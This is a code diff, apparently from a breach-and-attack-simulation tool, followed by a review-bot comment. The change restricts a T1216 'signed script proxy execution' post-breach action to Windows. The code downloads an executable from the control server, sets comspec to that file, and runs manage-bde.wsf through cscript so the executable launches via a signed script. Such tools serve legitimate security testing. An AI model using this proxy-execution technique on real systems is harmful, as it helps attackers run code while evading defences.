diff --git a/CHANGELOG.md b/CHANGELOG.md
index 84fd4e114..16c53a610 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -21,6 +21,8 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
 ### Fixed
 - A bug in network map page that caused delay of telemetry log loading. #1545
 - Windows "run as a user" powershell command for manual agent runs. #1570
+- A bug in the "Signed Script Proxy Execution" PBA that downloaded the exe on Linux
+  systems as well. #1557
 
 ### Security
 
diff --git a/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py b/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py
index 0431dd83d..414f95e3e 100644
--- a/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py
+++ b/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py
@@ -1,21 +1,28 @@
 import os
 
 from infection_monkey.control import ControlClient
+from infection_monkey.utils.environment import is_windows_os
 
 TEMP_COMSPEC = os.path.join(os.getcwd(), "T1216_random_executable.exe")
 
 
 def get_windows_commands_to_proxy_execution_using_signed_script():
+    signed_script = ""
+
+    if is_windows_os():
+        _download_random_executable()
+        windir_path = os.environ["WINDIR"]
+        signed_script = os.path.join(windir_path, "System32", "manage-bde.wsf")
+
+    return [f"set comspec={TEMP_COMSPEC} &&", f"cscript {signed_script}"]
+
+
+def _download_random_executable():
     download = ControlClient.get_T1216_pba_file()
     with open(TEMP_COMSPEC, "wb") as random_exe_obj:
         random_exe_obj.write(download.content)
         random_exe_obj.flush()
 
-    windir_path = os.environ["WINDIR"]
-    signed_script = os.path.join(windir_path, "System32", "manage-bde.wsf")
-
-    return [f"set comspec={TEMP_COMSPEC} &&", f"cscript {signed_script}"]
-
 
 def get_windows_commands_to_reset_comspec(original_comspec):
     return f"set comspec={original_comspec}"
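Review bot: On non-Windows hosts the new branch in get_windows_commands_to_proxy_execution_using_signed_script leaves `signed_script` as `""`, so the function still returns `[f"set comspec={TEMP_COMSPEC} &&", "cscript "]` — a command line with no script argument — instead of signalling that there is nothing to run; the caller is outside this hunk, so whether it executes that list unconditionally cannot be seen here. If it does, returning `[]` on the non-Windows path would be safer, and in any case the contract deserves a docstring such as `"""Return the shell commands for the T1216 PBA; on non-Windows hosts the executable is not downloaded and the script path is left empty."""`. In `_download_random_executable` the file is opened before `download.content` is read, so if `ControlClient.get_T1216_pba_file()` can return `None` or a failed response (not visible here), an empty `TEMP_COMSPEC` is left on disk when the attribute access raises — a guard on `download` before `open()` would avoid that. The `random_exe_obj.flush()` inside the `with` block is redundant, since leaving the block closes and flushes the handle.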